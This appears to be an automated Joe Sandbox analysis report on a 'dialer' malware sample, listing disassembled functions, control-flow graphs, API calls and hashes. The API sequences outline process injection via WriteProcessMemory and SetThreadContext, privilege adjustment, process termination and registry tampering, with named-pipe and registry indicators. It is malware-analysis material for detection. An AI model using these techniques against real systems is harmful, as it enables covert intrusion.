                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                                Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                                Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                                Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                                Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                                Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Non-executed Functions

                                                                                Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                                Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002A.00000002.3359603853.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000002A.00000002.3359315944.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360010625.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000002A.00000002.3360385903.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 1646373207-2227199552
                                                                                • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_00000001400058E1 1 Function_00000001400056E1 2 Function_0000000140001AE4 33 Function_0000000140001D40 2->33 75 Function_0000000140001BA0 2->75 3 Function_00000001400014E5 72 Function_0000000140001394 3->72 4 Function_00000001400010F0 5 Function_00000001400014F4 5->72 6 Function_0000000140001E00 7 Function_0000000140001800 66 Function_0000000140002290 7->66 8 Function_0000000140002F00 57 Function_0000000140001370 8->57 9 Function_0000000140001000 9->6 39 Function_0000000140001750 9->39 81 Function_0000000140001FB0 9->81 87 Function_0000000140001FC0 9->87 10 Function_0000000140002500 11 Function_0000000140003101 12 Function_0000000140005701 13 Function_0000000140005801 14 Function_0000000140001503 14->72 15 Function_0000000140001404 15->72 16 Function_0000000140002104 17 Function_0000000140001E10 18 Function_0000000140001512 18->72 19 Function_0000000140002420 20 Function_0000000140002320 21 Function_0000000140003120 22 Function_0000000140001521 22->72 23 Function_0000000140005721 24 Function_0000000140001422 24->72 25 Function_0000000140001530 25->72 26 Function_0000000140005C30 58 Function_0000000140005970 26->58 27 Function_0000000140001431 27->72 28 Function_0000000140005631 29 Function_000000014000153F 29->72 30 Function_0000000140001440 30->72 31 Function_0000000140003140 32 Function_0000000140001140 46 Function_0000000140001160 32->46 33->66 34 Function_0000000140005741 35 Function_0000000140001F47 56 Function_0000000140001870 35->56 36 Function_0000000140005950 37 Function_0000000140002050 38 Function_0000000140001650 40 Function_0000000140003051 41 Function_0000000140005651 42 Function_000000014000155D 42->72 43 Function_000000014000145E 43->72 44 Function_0000000140002660 45 Function_0000000140003160 45->8 45->14 45->22 45->24 45->25 45->27 45->29 45->30 45->43 45->44 51 Function_000000014000156C 45->51 52 Function_000000014000146D 45->52 45->57 45->58 62 Function_000000014000157B 45->62 78 Function_00000001400015A8 45->78 79 Function_00000001400014A9 45->79 88 Function_00000001400016C0 45->88 97 Function_00000001400014D6 45->97 100 Function_00000001400026E0 45->100 46->45 46->46 46->56 63 Function_0000000140001880 46->63 65 Function_0000000140001F90 46->65 46->88 47 Function_0000000140001760 101 Function_00000001400020E0 47->101 48 Function_0000000140002460 49 Function_0000000140005761 50 Function_0000000140001E65 50->56 51->72 52->72 53 Function_000000014000216F 54 Function_0000000140005770 55 Function_0000000140003070 59 Function_0000000140001A70 59->33 59->75 60 Function_0000000140005671 61 Function_0000000140005871 62->72 63->19 63->33 63->44 63->75 64 Function_0000000140005980 64->58 67 Function_0000000140002590 68 Function_0000000140003090 69 Function_0000000140002691 70 Function_0000000140005691 71 Function_0000000140005791 72->26 72->64 73 Function_0000000140002194 73->56 74 Function_000000014000219E 75->33 80 Function_00000001400023B0 75->80 92 Function_00000001400024D0 75->92 76 Function_0000000140001FA0 77 Function_00000001400058A1 78->72 79->72 82 Function_00000001400022B0 83 Function_00000001400026B0 84 Function_00000001400030B1 85 Function_00000001400056B1 86 Function_0000000140001AB3 86->33 86->75 89 Function_00000001400057C1 90 Function_0000000140001AC3 90->33 90->75 91 Function_00000001400014C7 91->72 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400026D0 96 Function_0000000140001AD4 96->33 96->75 97->72 98 Function_00000001400022E0 99 Function_00000001400017E0 99->101 100->3 100->5 100->14 100->18 100->42 100->43 100->44 100->57 100->58 100->79 100->91

                                                                                Executed Functions

                                                                                Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
